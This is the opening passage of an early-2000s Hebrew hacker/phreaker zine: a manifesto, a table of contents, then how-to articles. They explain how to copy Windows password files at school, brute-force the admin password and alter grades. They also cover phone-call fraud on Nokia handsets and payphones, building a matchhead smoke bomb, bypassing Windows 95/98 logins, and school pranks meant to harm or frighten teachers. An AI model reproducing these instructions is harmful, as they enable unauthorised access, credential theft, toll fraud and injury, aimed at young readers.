By

R  A  Z  O  R

&

GeHeNoM, Blood Runner, Rul3r, Pirs[i]ng, E-Man , AiTi , Dr.Brain, CaTax, Bentz, y0g1 b3ar, IceFire3k, Rel8t, Milki, AKA, VB-Man, Cool-Guy, Zeos, BoR|S, waMaw, Boba Smith, ^Dak0Da^, ZeBra, Vortex, The-Mod, NDR311 .

 

אני לא אחראי בשום אופן למעשים\נזק\בעיה\כל דבר שנגרמים בגלל קריאת טקסט זה לא ישירות  ולא בעקיפין . כל החומר כאן היא למטרה לימודית בלבד ואסור בשום פנים ואופן  להשתמש בו .

שלום

 

קודם כל אני רוצה להבהיר שכשאני כותב מאמר אני תמיד רושם את כל הדברים

מהלב אז תסלחו לי אם זה יהיה רגשני או ילדותי מידי - זה בא מהלב .

 

שמי Razor היום  (Bidia-Boy > Old-Hacker > Razor  )

 

הסיפור שלי מתחיל בכיתה ד' - תמיד הייתי סקרן ורציתי לדפוק את רשת

הטלפונים - התחלתי להתעניין ... יחסית לכיתה ד' היה לי מזל כי קומה

מתחתי גר אז Jacob - הוא היה אז בן 18 - עולה חדש שלא יודע עברית

אני שגם עליתי מרוסיה אהבתי את מה שהוא עושה - לא היה אז אינטרנט

היה רק BBS משהו דומה ל FTP ( שרת שאפשר להוריד ממנו קבצים ) ... אני

ישבתי אצלו בבית קרוב ל5 שעות ביום ( יעקב - אני יודע שאף פעם לא

תקרא את השורות האלה אבל אני מצטער בכל זאת ) מול מחשב ה 486 שלו

עם מודם 36 k וסידי רום ( הוא קנה את המחשב ב12 אלף ש"ח ) ואז אני

זוכר אותנו מורידים קבצים במהירות של 3 k לשניה ... ( מצטער חברה

שמרחתי - נוסטלגיה ) אז ככה נחזור לעניין הוא תמיד היה המורה שלי

למחשבים - הוא היה תותח - כל העיר הייתה בא אליו ומבקשת עצות בנוגע למחשב

( אני לא מגזים - כל העיר! , היום גם באים אליו אבל כבר אין לו זמן -

תבינו בהמשך ) טוב אז הוא היה המורה הראשון שלי... אחרי שהוא עבר דירה

קנו לי את המחשב הראשון שלי 133mhz בהפתעה -( אני בכייתי - הייתי קטן )

אז על השבוע הראשון הרסתי את כרטיס הקול ( אבא כעס ) ... באסה ... לא משנה - אז התחלתי להתאמן בגו'גיסטו והכרתי שם את SBH שיישאר איתי לכל

החיים ולא משנה אפה הוא יהיה ואפה אני אנחנו תמיד נהייה פתוחים אחד

לשני - הוא גם היה מבוגר ממני ב4 שנים - הוא גם היה תותח במחשבים

הוא עזר לי לתקן את כרטיס הקול ובפעם הראשונה עשינו על המחשב שלי

ניסוי - התקנו ווינדוס 95 - זאת הייתה " חוויה " - היינו מוכרחים

להעביר על דיסקטים את הווינדוס למרות שקיבצנו בRAR (אז זאת הייתה התוכנה

המובילה בתחום ) לקח לנו חצי יום ( שימו לב : זה חבר - מישהו שמוכן להיתקע

אתך חצי יום ורק בשבילך ) טוב אז הצלחנו ... עברו כשנתיים והתבגרתי קצת

וגם SBH ( יעקב עזב את הרחוב - אף פעם הוא לא הכיר את SBH ולא ידע גם

על קיומו- זאת הפעם הראשונה שאני חושב על זה! ) התחלנו עם הHacking

השגנו כמה סיסמאות ויוזרים והתחלנו להריץ את העסק ( כיתה ו' בערך)

אהבנו את זה אבל התבאסנו שSBH קיבל חשבון של 1400 משהו כזה ... אימא

שלו התעצבנה וסגרה לו את הקו של הטלפון (אפילו שהוא עבר לפ"ת רק לפני

כמה חודשים פתחו לו את הקו שוב - אבל כמו שאני מכיר את SBH הוא בטח צלצל

לכל העולם על חשבון בזק (: )  אחרי המקרה הזה אני עברתי מדירה לבית

( אני נמצא עכשיו בקומה ה3 בבית משם אני כותב ). אז נסגר פרק כל-כך מתוק

בחיים שלי - את החברים הכי טובים השארתי מאחור למרות שזה באותו ישוב

חברים שגם לא היו בעניין של ההאקינג עזבתי אותם - זה היה מעבר קשה - שמואל אחרי שנה עבר לפ"ת וחבר אחר טוב שלי מאז נשאר שם וגם נשאר שם היום

(אבל היום אנחנו רק ידידים - חבל ): ) ...

 

הבטחתי לעצמי לבקר את SBH כל שבוע בערך פעם אחת לפחות - הצלחתי ועדיין

היינו חברים טובים למרות הגילאים וכל המבחנים שלו שהיום אני עובר אותם

טוב אנחנו שמרנו ואז התחלנו עם הקטע של הפריקינג גנבו PBX , 1800 ועוד

היום בזק עלו על השיטות - אז זה היה חלום לכל פריקר היה לנו טלפון חינם

על חשבון בזק , עכשיו העניין הרבה יותר מסובך - נחזור לנושא - SBH עבר

דירה עם אימא שלו לפ"ת ): יעקב עבר עוד מקודם למקום אשר היה מרוחק ממני

אולם עדיין שמרנו על קשר ... באותו זמן יעקב עבר למקום עוד יותר רחוק

ונשארתי לבד . היה לי נורא משעמם בזמנים אלו - דפקתי את המוח עם משחקי מחשב ( שהיום אני לא נוגע בהם - ממליץ לכם להפסיק ) עד ש Batman911 בא!

אז הייתי בכיתה ז - התחילו שוב חיי ההאקינג,פריקינג - ואז גם בגללו

נכנס העניין של טרוריזם לחיי - בלשון עממית = אנרכיה - עשינו פצצות

מגפרורים , גנבנו חבלים מבניה ( רדפו אחריי וכמעט נדרסתי ): בבריחה ...

אז ככה החיים חזרו למסלולם - חזרתי להיות האקר כמו בן אדם ולא לשחק

בשטיות ( משחקי מחשב ) מאז לא שיחקתי בהם אלא רק התחלתי ללמוד איך לפרוץ

אותם - ואז נכנס הקטע של הקראקינג לחיי - איזה כיף זה שאתה מצליח אני זוכר את הפעם הראשונה ( לא בסקס ) רצתי בכל הבית קפצתי כמו משוגע אפילו נזלה לי דמעה של התרגשות ( כן אני אדם נורא רגשני ) זה היה הכיף וזה גם היה המפתח להמשך הדרך - הבנתי אז שאת כל השטויות שעשיתי עם יעקב ואח"כ עם SBH ואח"כ עם Batman911 לא היו לחינם - אלא פרצתי תוכנה ( לפריצת אתר אני לא מייחס חשיבות רבה - עשיתי את זה עוד עם JACOB בימיה הראשונים של הרשת ) - אז זה היה רגע של עליית רגשות – זה כמו זריחה אבל בלב - קשה לתיאור.

 

אז לא משנה אז הכל התפתח כל השטיות של הפיירוואל התחילו והאתגר נהייה הרבה יותר קשה ... גם שעברתי לתיכון שרחוק 45 ק"מ מביתי היה לי קשה

( השקמה 5:50 חזרה 16:00 ) ... ולקחתי כמה חודשים של הפסקה ואז הכל לאט לאט חזר לעצמו - ביקרתי את SBH כמה פעמים בפ"ת את יעקב אני תמיד ביקרתי בערך פעם לחודש  ואת באטמן אני לא צריך לבקר ... הוא שכן שלי (: .

 

היום זה אחרת - אני כבר בן 15 ואני מייחס חשיבות פחותה לכל הדברים ...(גם בגלל המין השני )

אבל עדיין אני פורץ אתרים , טלפוניה , אני בהרבה פחות אנרכיסט וגם לא קרימינל .

 

 

יעקב       - עובד ברשתות תקשורות במוסד גדול .

SBH בצבא   - לא לקחו אותו ליחידת מחשבים משום שלא היה לו ציונים משהו .

Batman911  - אנרכיסט מושבע - שכן שלי - תמיד אפשר לסמוך עליו .

Bidia boy  - נפטר משום שנהפך ל Old-hacker ובגלל שלא רצה להחזיק בשם הקשור לכפר ערבי ( בהתחלה זה היה בצחוק ) בגלל האינטיפדה וגם כבר מזמן ... לא BOY .

Old-Hacker - נפטר והפך לRazor משום שנתפס על פריצה לרשת מחשבים גדולה .

Razor      - חיי נושם פורץ,מפצח,מאזין,לומד וכותב לכם את הספר  .

 

 

תמיד היה לי חלום , חלום שברגע זה מתגשם - חלום החופשיות , חלום הזכיות השוות לכולם , חופש הלימוד , חופש לדעת שיש דברים אחרים שאתם מסוגלים לעשות , חלום שהוא ההסבר לכל מה שלמדתי בחיי מהאקינג ובכלל מהחיים דברים שאי אפשר לקרוא באנציקלופדיה וגם לא ילמדו אתכם את זה באוניברסיטה כי הם לא רוצים שתדעו הם סותמים לנו את הפיות - בשורות האלה אנחנו מפיצים את המידע לכולם ובחינם אנחנו לא רוצים שתשלמו על זה ( אם אתם רוצים בכל מקרה שימו חצי שקל בצדקה לחולים - זה יהיה התשלום בשבילנו ) אנחנו רוצים ללמד לעזור ולהפיץ את הידע לאזן את הרמות בחברה להרוס את העדות ...- איו אצלנו רוסי,מרוקאי וכדומה הכל שווים( sbh הוא העדה המנוגדת בדיוק לשלי ואנחנו החברים הכי טובים ) אנחנו רוצים חברה אשר תחייה לפי כללים אחרים לגמרי ... אנחנו עוזרים לכולם , לכל מי שרוצה לדעת אותו נלמד ולא משנה מה זה כמה זה יעלה לנו - אנחנו חיים על פי דפוסי התנהגות אחרים - לא צוחקים על מי שלא יודע אלא מנסים להסביר לו - אנחנו אחרים. אם אתם רוצים להמשיך לעזור לי להגשים את

החלום שלי אני מבקש דבר אחד מכם - תפיצו את הספר לכמה שיותר אנשים , תלמדוו אנשים ואף פעם אבל בחיים אל תצחקו או תפגעו במי שלא יודע כי תמיד יהיה מי שיודע יותר מכם והוא יוכל לעשות לכם את אותו הדבר - תעזרו אחד לשני לנצח במלחמת הידע וככה כולם נהיה שווים מאוחדים והרבה יותר חופשים!.

 

 

יש לי  כמה מילים אחרונות למשטרה לבזק ולממשלה - אתם תמיד תנסו לעצור אותנו ואתם

תצליחו לאט לאט אבל אתם לעולם לא תעצרו את הידע את החופשיות שזורמת

בעורקנו - אולי אותי אתם תעצרו אותי ואת חבריי אבל את הנפש החיה בקרב ההאקרים תשאר חיה ובועטת לנצח  , אתם שניסיתם לעצב חברה שוויונית - אתם שייצרתם את פצצת האטום אתם שגזלתם במלחמות אלפי נפשות אלפי חלומות פנו דרך תנו לנו לעבור לאנשים הרוצים את הדבר הכי טוב שקיים באדם את החוכמה ואת הצדק השוויוני שמגיע לכל אחד  ואל תנסו לעצור אותנו כי לא תצליחו אולי תעצרו חלק מאתנו אבל לא תצליחו לעצור את כולנו . בסה"כ  לכולנו מטרה משותפת לא להרוס לא לפרוץ אלא ללמד ולבנות עולם טוב יותר ! . יחי החירות ! .

By RAZOR

 

 

 

תוכן

 

כותב

שם המאמר

עמוד

Old-Hacker

איך לפרוץ לרשת ביה"ס ולשנות ציונים

5-6

Old-Hacker

שיחות חינם בפלאפונים של נוקיה כל הגרסאות

7

Old-Hacker

מה כדאי לעשות בביה"ס – חלק א

8

Old-Hacker

שיחות חינם בטלפונים שעובדים על טלכרטים

9

Old-Hacker

פצצת עשן

10

GeHeNoM

פריצת סיסמאות Windows 98\95

11-13

GeHeNoM

איך לגנוב כסף ממכשירי טלפון

14-15

GeHeNoM

הכנת מכשיר ציטוט מהפלאפון

16

GeHeNoM

פריצת סיסמת הצנזורה של Interner Explorer

17-18

GeHeNoM

שימוש חוזר בכרטיסי טלכרט

19

GeHeNoM

שימוש חוזר בכרטיסי טלכרט – שיטה ב'

20

GeHeNoM

זיוף E-Mail   חלק א

21-24

GeHeNoM

זיוף E-Mail  – חלק ב

25-31

GeHeNoM

זיוף E-Mail   חלק ג

32-34

GeHeNoM

מדריך לזיוף E-Mail מקוצר

35-36

GeHeNoM

מה כדאי לעשות בביה"ס – חלק ב

37-39

GeHeNoM

אייקונים בביג טוק

40

GeHeNoM

פריצה למחשבים

41-44

Rel8t

פצצת מנורה

45

GeHeNoM

אנרכיה – הסבר

46

Blood Runner

פצצת דיסקט

47

Blood Runner

Port Scanning

48-49

IceFire3k

טיפול "משמעתי" בקרציות

50

IceFire3k

גפרורים שמישים מתחת למים

51

GeHeNoM

שרתי פרוקסי

52-54

Zero Cool

AKA

Blood Runner

התקשרויות מחשבים: חלק ראשון: איך לבנות סרבר

55-57

Like part 1

התקשרויות מחשבים: חלק שני: איך לבנות קליינט

58-59

Blood Runner

שימוש בטלנט לקריאת E-mail

60-61

y0g1 b3ar

אינטיפדת טלפונים

62

Blood Runner

פורט סקנינג

63-65

Blood Runner

הבנת כותרות E-mail

66-69

GeHeNoM

החלפת מסכי הפעלה/כיבוי

70-71

Bentz

מספרים שימושים

72-73

Bentz

נטרול התוכנה סייבר-פורטל

74-75

Blood Runner

פריצה לאתרים – דוגמאות לאקספלוייטים

76-79

Pirs[i]ng

איך להאיץ את ה ADSL \ לחבל במודמי ADSL

80-81

waMaw

שימו בפסיכולוגיה כדי לגנוב סיסמאות

82-83

BoR|S

ביוגרפיה של ההאקר הכי מפורסם בעולם

84-86

E-Man

כסף חינם

87-88

Old-Hacker

כסף חינם – בלי דורופים

89

E-Man

איך לקבל אינטרנט יותר זול מכולם

90

E-Man

מזומן חינם... – איך לעבוד על מכונות שפורטות כסף

91-92

Milki

Old-Hacker

דיבור ללא תשלום בטלפון ציבורי

93

Old-Haacker

כוח ברוטלי

94

Cool-Guy

Blackdeath

Oldhacker

פצצת צבע

95

Zeos

המדריך לCracker המתחיל

96-98

VBman

אסמבלר לCracker

99-100

Pirs[i]ng & Zeos

איך להפוך ממספר עשרוני לבינארי ולהפך

101

Zeos

פיצוח הגנות לcd   גרסה 1.1

102-103

Pirs[I]ng

קידוד והצפנה

104-106

Zeos

בסיס הקסדצימלי – המרה

107-109

Zeos

המדריך לפיצוח מעשי של הגנת סיסמא

110-113

E-Man

פריצת סיסמאות בWindows NT

114-115

Razor

האתיקה של ההאקרים

116

Pirs[I]ng

שקר \ אמת על הפריקינג

117

AiTi

חיפוש במזבלות לפריקרים

118

Boba Smith

Tni Box

119-120

AiTi

המספרים המיוחדים והקידומות של נזק

121-122

AiTi

סריקת מספרי 1800

123-124

AiTi

PBX

125-126

CnTax

המדריך ליצירת טונים בנוקיה

127-128

AiTi

רשימת הקופסאות השונות ותפקידם

129

AiTi

המדריך המלא לסריקת תדרים באוויר

130-131

AiTi

פריצה לטלפונים שעובדים על מטבעות

132-133

Pirs[I]ng

תדרים

134

Pirs[I]ng

שיחות חינם בטלפונים שעובדים על מטבעות – דרך ב'

135

Pirs[I]ng

פריצה למשיבון סלולרי

136

Pirs[I]ng

זיוף מספר השולח בשילחת הודעות

137

AiTi

Beige box

138-139

^Dak0Da^

פריצת חדרים בMirc

140

^Dak0Da^

פריצת ניקים בMirc

141

ZeBra

בקבוק תבערה

142

Razor

איך לבנות לביור

143

Zeos

Windows Tricks Part 1

144-146

Zeos

Windows Tricks Part 2

147-148

Pirs[I]ng

Wap

149-150

Y0gl-B3ar

פריצה לאתרים בעזרת UniCode

151-153

Rul3r

המדריך המקיף על טרוייני

154

Pirs[I]ng & Zeh

סאבנטינג

155-156

Vortex

דואר אנונימי דרך טלנט

157-159

CnTax

חשבונות Shell

160-161

Pirs[I]ng

פרוטוקולים

162-163

[Twix]

מבוא לשכבת OSI

164-166

CaTax

תרבות ההאקרים

167-168

Tricker

מידע על IP וערוצים ע"י פקודות Netstat

169-171

Vb-Man

אנונימיות בirc

172

The-Mod

פריצה ל - icq

173-178

Pirs[I]ng

מה היא פריצה ? + דוגמה

179-181

Razor & Boba Smith

יצירת טונים בשפת C

182-183

Pirs[I]ng

הסבר על סוגים שונים של כבלים

184-186

Pirs[I]ng

איך להרוס סוגים שונים של כבלים

187

Pirs[I]ng & Rul3r

מושגים

188-189

NDR311

אנונימיות - אין להיות אנונימי ואיך לגלות דברים על אנשים אחרים

190-192

Pirs[I]ng

מדריך מקיף על אסמבלר

193-197

RAZOR

צור קשר

198

RAZOR

תודות

199

RAZOR

סוף דבר

200

 

 

איך לפרוץ לרשת ביה"ס ולשנות ציונים

 

טוב , אני מאמין שכל אחד חלם לעשות את זה ...

לפרוץ לרשת של התיכון ולעקוף את החנון של הכיתה בציון בזמן שאתה בכלל לא נמצא בשיעורים . היום תלמדו איך להגשים את חלומכם !!!

זו לא תהיה הפריצה הנוחה לשרת של walla  בבית שאתה נח על הכסא בבית שותה קולה ואוכל פיצה עם חברים ומספר בדיחות , זו תהיה פריצה קשה כי תמיד החנפן של הכיתה יכול לומר לאחראי – " תסכל את הילד הזה מה הוא עושה ??!?!?" ואז האחראי באה תופס אותך ומזיין אותך ואת האימא שלך שמחר צריכה להיות במבנה הכי מאוס על נערי העולם .. .

 

טוב דבר ראשון לשם הפריצה  הציונים צריכים להיות על אותה רשת מחשבים שעליה אתה עושה את הפעולה  .

 

טוב נתחיל :

מצרכים :

  1. דיסקט ( חדש שלא יהיו פשלות )
  2. אומץ
  3. תוכנית מילוט מוכנה

 

שלב 1

אתה מדליק את המחשב נכנס לwindows  והמחשב מבקש ממך סיסמא .. אתה לוחץ ביטול או אישור והמחשב נדלק .

 

אתה הולך ל Run.

ולוחץ Command

 

אז נפתח לך חלון Dos

 

ואתה כותב

copy c:\windows\*.pwl a:

זה מעתיק את הקבצים של הסיסמאות לדיסקט את מוציא את הדיסקט שם בתחתונים ( או בכיס (אפה שיותר נוח )) סוגר את חלון הדוס ואתה חף מפשע .

*עבור לשלב 2

 

אם זה לא עובד ואחראי הרשת המזדיין שם  הגנה לRun  (אבל הוא לא יודע שיש אחד שקוראים לו Old-hacker ) כנס לInternet Explorer  ובמקום לכתוב אתר כתוב

C:\command.com

תכניס דיסקט

לחץ

copy c:\windows\*.pwl a:

*עבור לשלב 2 

 

 

 

ואם האחראי משחק איתי יותר מידי וחושב שהוא יותר חכם ממני אז פתח את המחשב ולחץ F8  עד שתופיע טבלה ובחר בה .ms-dos promp

וכתוב

copy c:\windows\*.pwl a:

*עבור לשלב 2

 

ואם הוא חסם גם את זה והוא ממש מתגרה בכם וחוסם גם את זה יש פתרון –

הכינו דיסקט הפעלה בבית לא משנה איזה 95\98\ME .

עושים את זה כך :

נכנסים לחלון דוס ע"י

Run > command > sys a:

הולכים לתיכון ומכניסים אותו ...

מחקים קצת עד שיופיע מסך כזה

Microsoft(R) Windows 98

Copyright Microsoft Corp 1981-1998.

 

<C:\

וכותבים

copy c:\windows\*.pwl a:

·        ועוברים לשלב 2

 

ואם זה לא מצליח אנא צרו קשר איתי בicq 106836363

או באיי מאייל [email protected]

ואני אסביר לכם עוד שיטות – אני מבטיח שתצליחו .

 

שלב 2

 

עכשיו אני יסביר איך לעשות את הפריצה המעשית ולהתחבר לשרת לא כתלמידים מסכנים אלא כמנהלי הרשת . וכך לשנות את הציונים בתוכנות של המורים . לרוב כ99% הסיסמאות של מנהל הרשת הם אותם סיסמאות של תוכנת הציונים אז לא יהיה לכם בעיה ( גם לרוב אין לתוכנות אלה סיסמא- כך זה בתיכון שלי ) .

 

מגיעים הביתה עם הדיסקט שמחים אחרי יום לימודים קשה ...( בהמשך המגזין אני יסביר איך לעשות אותו כיף וקל ) .

ונכנסים לwindows ופותחים את השלל שיש בדיסקט ורואים לרוב יש שם את הקבצים האלה או קבצים דומים :

Guest.pwl or student.pwl

Admin.pwl

 

בקבצים אלו ישנה סיסמא מוצפנת וצריך תוכנה כדי לפצח אותה – התוכנה המועדפת עלי היא Cain ואפשר להוריד בפינת ההורדות באתר שלי .

http://freehost18.websamba.com/razor

 

נכנסים אליה והולכים ל

File > add to list

ומוסיפים את הקבצים שהעתקתם קודם ( עדיף להקליט את הקבצים להארד דיסק וכך הפעולה תהיה מהירה בהרבה ) .

בודקים קודם ב Configure  שהV  עומד על Brute force attack.

לוחצים על הקובץ של מנהל הרשת עם הכפתור הימני ולוחצים Attack .

לכו לשתות קולה או לטייל עם הכלב והתוכנה תנסה לפרוץ – זה ייקח זמן יכול להיות גם כל הלילה .

 

אחרי שאתם מצאתם את הסיסמא אתם הולכים לתיכון ונכנסים עם השם משתמש של שם הקובץ של מנהל הרשת ועם הסיסמא וכל המחשב פתוח בפניכם וכל "השכנים ברשת " ...

עכשיו העבודה קלה- תמצאו את תוכנת הציונים ותשנו לכם את הממוצע ל9-10 ותגידו תודה רבה ל Old-hacker  או לבייל גייטס שעשה מערכת הפעלה שעשה מערכת שכל-כך קל לפרוץ אליה .

 

By Old-Hacker [I.C.F]

שיחות חינם בפלאפונים של נוקיה כל הגרסאות

 

בדקתי את זה וברשת סלקום זה עובד בטוח – נכון ל 7 באפריל 2001 .

כדי לנסות את זה באורנג'

 

טוב אז ככה  קודם אני אסביר על איזו שיטה זה עובד שלא תישארו Lamer ים

שרק יודעים לעשות ולא יודעים למה ? .

כשאתם מתקשרים למשטרה ואמבולנס ולמכבי אש  זה לא עולה לכם כסף ...

אז אפשר לתכנת במכשיר שהמספר של המשטרה הוא מספר של חבר שלך וככה כשאתה מתקשר לחבר המכשיר חושב שאתה מתקשר למשטרה וככה זה לא עולה לך כסף  .

 

 

  1. כותבים קוד טכנאי שהוא

*#12345#3001

מקישים את ה3 ראשון = משמאל לימין

 

  1. הולכים בתפריט  ל Emergency Numbers

·        יהיו שם מספרים של המשטרה בישראל ,אמבולנס ומכבי אש ( 100 , 101 , 102)

 

  1. ומשנים את מספרי החירום למספר שאתם רוצים להתקשר אליו חינם .
  2. מכבים את המכשיר .
  3. מחכים קצת = 10 \20 שניות .
  4. מדליקים ומנסים לחייג את המספרים שכתבתם .

7.אם הכל עובד – אתם כותבים את אחד המספרים שכתבתכם ב Emergency Numbers ועל המכשיר תופיע ההודעה הבאה : Attemping Emergency Call

או בעברית " מנסה ליזום שיחת חירום " .

 

וזהו ... יש לכם שיחות חינם , תדברו חופשי ...

 

אפשר לעשות את אותו דבר עם כל סוגי הטלפונים – על אותו עיקרון – שינוי מספרי שיחות חירום . בהצלחה

 

By Old-Hacker [I.C.F]

*לא עובד לזמן הוצאת המאמר – סלקום עלו על זה *
מה כדאי לעשות בבית הספר

 

זה טקסט קצת דפוק ( אני מודה ) אבל  סתם כדי לצאת מהשגרה הבאתי לכם כמה שיטות .

 

אני אתן לכם 11 שיטות להנאות מביה"ס מהגרוע ביותר למוצלח  ביותר .

11. ללמוד.(חחח...)

10 . לשים למורה לפני שהוא בא דבק על הכיסא ואז הוא מתיישב לאיזה חצי שעה ולא קם ...

9.להדביק ג'לי מגעיל על התקרה ואז כשהמורה יכנס לכיתה הג'לי ייפול לו על הראש והוא לא ישים לב .

8.לשים פתק על הגב של המורה – הכי בטוח וגם מצחיק .

7.לכתוב בשירותים על הדלתות בגרפיטי .

6.להביא פצצת סרחון ולזרוק לחדר מורים בתחילת היום .

5.להוציא את הנייר טואלט מהשירותים ולהכניס אותו לאסלות בתחילת היום  להוריד את כל המים ולבוא ב 5 לשמונה ולראות אקווריום ולא תיכון .

4.לשים למורה בלון פלוצים ... ממש מצחיק .( אולי זה לא בעצם ) .

3.לקחת את הנפצים הקטנים האלה שמוכרים אותם ב50 ל3 שקל – ולשים אותם מתחת ליומן של הכיתה , המורה יבוא וידפוק את היומן על הנפצים ואז הוא יקבל הלם .(במקרה טוב הוא יהיה חירש-סתם...לא יפה).

2. לטלפן לביה"ס ולעשות כאילו אתם ההורים של איזה ילד ולהגיד שאתם חייבים שהוא יחזור הביתה  בגלל אירוע משפחתי ...- המזכירה תשחרר אותו והוא יגיע הביתה ולא ידע למה ... . (או לעשות את זה לכם כשאין לכם כוח ללמוד ).

1.

הדבר הכי פצצה

ללכת למזכירות ולבקש לטלפן לאחיך ולהגיד שזה בגלל אירוע משפחתי וזה דחוף... – אז במקום להתקשר לאחיך תעשה לטלפון עקוב אחרי למספר ארוטי ... ואז כל מי שמתקשר לביה"ס מתבייש בו וחושב שהוא הגיע למספר ארוטי=חחחח (את המספרים אפשר להשיג בכל סוף עיתון) .

 

 

By Old-Hacker  


שיחות חינם בטלפונים שעובדים על טלכרטים

 

כעת אני ילמד אתכם  איך לזיין את "נזק" ולהשתמש בשירות גוביינא כדי לקבל שיחות חינם . –אחרי שתקראו את  הפרק הזה אתם תגידו ביי לטלפון בבית .

 

מצרכים :

 

1. צליל של Coin Collet – אפשר להוריד בפינת ההורדות באתר שלי .

2. אוזניות 

3. ווקמן\דיסקמן\ Mp3Player   \ מיני דיסק – בקיצור כל דבר שאפשר להשמיע אייתו את הסאונד .( לאנשים מיוחדים – תנסו להתאמן לשרוק את הצליל – בצחוק –אף אחד לא הצליח ולא יצליח ) .

 

הפריצה

 

קודם כל מקליטים בבית על מכשיר ההקלטה (למשל ווקמן ) את הצליל

אח"כ הולכים לטלפון ציבורי ומחייגים

142

מצמידים את האוזניות לטלפון

מחכים 2\3 שניות אחרי שעונים ומשמעים את הצליל לטלפון ויש קריין שמבקש ממך שתכניס סיסמא .

הסיסמא היא אחד מהאפשריות הבאות :

0000001

0000002

0000003

0000004

0000005

0000006

0000007

0000008

0000009

00000010

מתחילים משמאל .

*הסיסמא אחרי כל שיחה משתנה .

תנסו את כל 10 האפשריות וכשתגלו את הסיסמא תשמעו צליל של קו ותחייגו לאן שבא לכם .

יש לכם עכשיו טלפון חינם.

By Old-Hacker [I.C.F]

 

פצצת עשן

 

 

אני אלמד אתכם עכשיו איך להכין פצצת עשן !!

 

חומרים :

הקרטון של המחברת (עדיף קרטון חלש )

דבק

חול

3 קופסאות גפרורים

נייר דבק

נייר

 

הוראות הכנה

 

לוקחים ת' מחברת ומפרקים לה את הצורה – סתם...

 

1. לוקחים את הקרטון וחותכים מרובע .

2 מדביקים עם נייר דבר

3.לוקחים את הראשים של הגפרורים ומפרקים אותם (גפרור אחד משאירים)

3.לוקחים דבק וחול מערבבים ויוצא כזאת עיסה , שופכים אליה את ראשי הגפרורים.

4.מבאים נייר ארוך ושמים אותו מסוף הקרטון להתחלה ומוצאים בערך 3 ס"מ מהקרטון.

5.עושים מהכל גליל .

6. מדליקים את הנייר שנשאר בחוץ עם הגפרור שנשאר -  יש עשן(הרבה...)  ... אם תשימו יותר גפרורים יהיה יותר עשן .

 

איור :

ככה בערך אמור לצאת

______________________________

&*&*&*&*&**&**&*&*&*****

&*&*&*&*&*&*&*&*&*******

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

&*&*&**&*&**&*&*&**&&***

_&&*&*&&*&&*&*&_&****____

בהתחלה כדי לשים יותר ראשי גפרורים מדבק – כדי שיידלק טוב .

 

מקרא :

_  = גליל.

 

& = עיסה של הדבק והחול .

*=ראשי גפרורים .

<<< = נייר

 

By Old-Hacker [I.C.F]

 

פריצת סיסמאות  Windows95/98

 

כתבתי את הכתבה הזאת כדי להראות לכם כמה שהווינדוס שלכם לא מוגן.

בעוד עשר, חמש עשרה דקות, כשתגמרו כבר לקרוא את הכתבה,

אתם תעריכו את המערכת הפעלה שלכם הרבה פחות, את עצמכם הרבה יותר,

ותוכלו להראות לחברים שלכם איזה ידע נפלא יש לכם. אבל הכי חשוב,

תוכלו לחדור לכל מחשב שמותקן עליו Windows95/98 אפילו אם הוא מוגן עם סיסמא.

רק דבר אחד לפני שאנחנו מתחילים - הפריצה הזאת היא פריצה לוקלית, מקומית.

כלומר היא עובדת רק אם יש לכם גישה פיזית למחשב שאליו אתם חודרים. יעיל מאוד במקרים הבאים:

בי"ס, מפעלים, בנקים, חנויות, חברים, וכו'

 

הגנת סיסמא

 

דבר ראשון, כדי להראות לכם איך לפרוץ את הסיסמא, צריך קודם להגן עם סיסמא.

איך אפשר לפרוץ משהו שלא קיים? אי אפשר.

לכן אם הווינדוס שלכם עוד לא מוגן בעזרת סיסמא, עשו את הצעדים הבאים:

 

לחצו על התחל, אפשרויות, לוח בקרה.

עכשיו לחצו על סיסמאות, תבחרו סיסמא שתוכלו לזכור, ותקלידו אותה.

התחילו את המחשב מהתחלה. כמו שאתם רואים, הווינודס יבקש סיסמא. כיתבו סיסמא לא נכונה.

מה קרה?

עכשיו כיתבו את הסיסמא הנכונה... מה קרה הפעם?

כמו שאתם רואים, אי אפשר להיכנס לווינדוס בלי לדעת את הסיסמא, נכון?

              

                          ---===== לא, לא נכון! =====---

 

פריצת הסיסמא

 

אני אראה לכם פה כמה שיטות, אנא נסו את כולם.

אח"כ תבחרו את זו שאתם הכי אוהבים, ותעשו חיים.

 

שיטה מספר 1

 

* התחילו את המחשב מהתחלה

 

* לחצו ברציפות על כפתור ה F5 הרבה פעמים בלי להפסיק.

 

מה שיקרה זה שהוונידוס יתחיל במצב Safe Mode

מצב זה נועד לתיקון תקלות בווינדוס, ולכן אינו מבקש סיסמא.

אומנם הכל ייראה קצת מוזר, ולא תוכלו להתחבר לאינטרנט,

אבל כל התוכנות יעבדו חלק, ויש לכם גישה להכל.

אם הסיסמא נועדה לדוגמא להגן על קבצי טקסט מסוימים,

אז הרגע שברתם את ההגנה העלובה, ואתם יכולים לגשת לקבציי טקסט ה"מוגנים" האלה.

 

 

 

 

שיטה מספר 2

* התחילו את המחשב מהתחלה

 

* לחצו ברציפות על כפתור ה F8 הרבה פעמים בלי להפסיק.

 

אתם תקבלו תפריט שייתן לכם לבחור איך להתחיל את המחשב. בחרו ב Command prompt only

מה שיקרה זה שהמחשב ייכנס לדוס. למי שלא מכיר, דוס זה בעצם מערכת הפעלה שפועלת ע"י פקודות מהמשתמש.

ווינדוס בעיקרון מבוסס על הגרעין של דוס אבל לא חשוב.

עכשיו הקלידו את השורה הבאה ולחיצו על מקש ה Enter:

 

rename c:\windows\*.pwl c:\windows\*.xxx

 

מה שבעצם קורה פה זה הדבר הבא:

מכיוון שאתם לא נכנסים לווינדוס עדיין, אז אתם לא צריכים להקליד סיסמא.

עכשיו, כשאתם כן צריכים להקליד סיסמא, כלומר כשאתם כן נכנסים לווינדוס, אז איך המחשב יודע אם הסיסמא

שכתבתם נכונה או לא? פשוט מאוד. הוא משווה את מה שאתם כתבתם לסיסמא האמיתית שנמצאת בתוך קובץ על

המחשב. אם מה שכתבתם תואם למה שבקובץ, הוא יודע שזה הסיסמא הנכונה, אם לא, אז הוא יודע שלא.

עכשיו, אם כך אז כל מה שהאקר צריך לעשות זה לפתוח את הקובץ ההוא, ואז הוא יודע את הסיסמא, נכון?

לכן מה שמיקרסופוט עשתה זה הצפינו אותו ע"י פעולה מתמטית, כאשר כל פעם שהם משווים בין הקבצים

הם עושים את אותה הפעולה למה שהקלדתם ואז משווים, כך אם תפתחו את אותו הקובץ,

הסיסמא תיראה באותיות לא מובנות ולא תוכלו לדעת מה היא אלא אם כן תדעו את אותה

